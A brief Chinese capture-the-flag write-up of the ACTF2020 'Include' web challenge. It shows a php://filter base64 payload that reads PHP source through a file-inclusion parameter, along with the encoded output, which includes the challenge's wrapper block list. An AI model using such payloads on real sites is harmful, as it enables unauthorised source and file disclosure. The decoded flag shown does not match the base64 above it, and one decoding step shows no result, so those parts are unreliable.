【ctfdouble】[ACTF2020 新生赛]Include
1、进入页面后,发现是一个超链接 点进去之后只有Can you find out the flag?一段文字。但是发现地址栏是file=flag.php
考虑文件包含。
2、F12查看源代码,没有发现什么
3、读取源代码
?file=php://filter/read=convert.base64-encode/resource=index.php
发现了一段PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V7CgllY2hvICc8YSBocmVmPSI/ZmlsZT1mbGFnLnBocCI+dGlwczwvYT4nOwp9Cj8+Cg==
base64编码。
解码后得到
4、读flag.php的源代码?file=php://filter/read=convert.base64-encode/resource=flag.php
得到PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL0NURjJ7ODQyYTcwYWEtMDRmMC00ODliLTg4MDYtODUwOTY2NzU1MDkzfQo=
解码后得到<?php
echo "Can you find out the flag?";
//CTF2{3}
浙公网安备 33010602011771号